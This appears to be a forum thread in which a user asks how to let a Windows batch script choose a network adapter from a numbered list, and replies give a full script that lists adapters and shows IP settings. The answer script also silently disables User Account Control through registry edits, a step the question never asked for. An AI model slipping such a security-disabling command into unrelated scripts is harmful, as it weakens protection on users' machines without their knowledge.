In batch code, how to make an input choice instead of typing?
Currently, I list all network adapters, and then the user needs to type the name of an adapter to proceed with the rest of the code.
:: Listing all network adapters
    echo/List all network adapters & netsh interface show interface
    
:: Getting the name of the network adapters and validating the user input
echo/ & set /p "_adapterName=Enter the interface name you want to fix: " || =;(
     echo You must enter a network adapter name! & exit /b );=


Instead, how would I use that list to so that a user could select an item from it by number?


This is not a script writing service, but you can get help here if you encounter issues. Since you already have some code, you might want to look at choice,https://tommydo.ca/en/how-to-create-a-selectable-list-in-window-batch-file-bat/,  https://www.robvanderwoude.com/choice.php and https://stackoverflow.com/questions/58633046/batch-choice-command-with-a-variable-choice. First populate a list of adapters, then display the list, then make a choice based on order in the list.

use the command choice. First you print out the list and add numbers, then use the command choice to query for a keypress. you can then use if errorlevel to find out what the choice was.

Use a for loop to manipulate the output according to your choice options, an additional one to save saving the item of interest in a variable. Together with substring and merging with your code (from a previous post), it would look like this:


@echo off && setlocal enabledelayedexpansion

echo/Disabling UAC & for %%i in =;( EnableLUA,ConsentPromptBehaviorAdmin 
    );= do >nul reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "%%~i" /t REG_DWORD /d 0 /f

echo/List all network adapters & echo/ & set /a "_opt=1-1"

set "_line=-------------------------------------------------------------------------"
echo/Option: Admn state     State          Type             Interface & echo/%_line% 

for /f usebackq^tokens^=* %%i in =;(
    `"netsh interface show interface | findstr /v "nterfac --""`
    );= do call set /a "_opt+=1" & call set "_opt%%_opt%%=[%%_opt%%]: %%~i" && =;(
         for /f usebackq^tokens^=3* %%I in =;(` "echo/%%~i" `);= do call set "_%%_opt%%=%%~J" 
            );= & call echo/   [%%_opt%%]: %%~i
            
echo/%_line% & set /p "_adapterNumber=Enter the interface number you want to fix: "

call set "_adapterName=%%_!_adapterNumber!%%" 

for %%G in =;( IPv4,Sub,Gate );= do for /f "tokens=1-2 delims=:(" %%A in =;('
     ipconfig /all ^| Find "%%~G" ');= do set "_%%~G=%%~B" && call set "_%%~G=%%_%%~G: =%%"

echo/ & netsh interface ip show addresses name="%_adapterName%" | findstr "DHCP.*Sim" >nul && =;(
    set "_dhcp=Yes" );= || set "_dhcp=No"

echo/Actual network configuration of host
echo/     IP Address: !_IPv4!
echo/    Subnet Mask: !_Sub!
echo/Default Gateway: !_Gate!
echo/           DHCP: !_DHCP!
echo/ & endlocal



you make my day :)

The same thing happens to me every now and then!
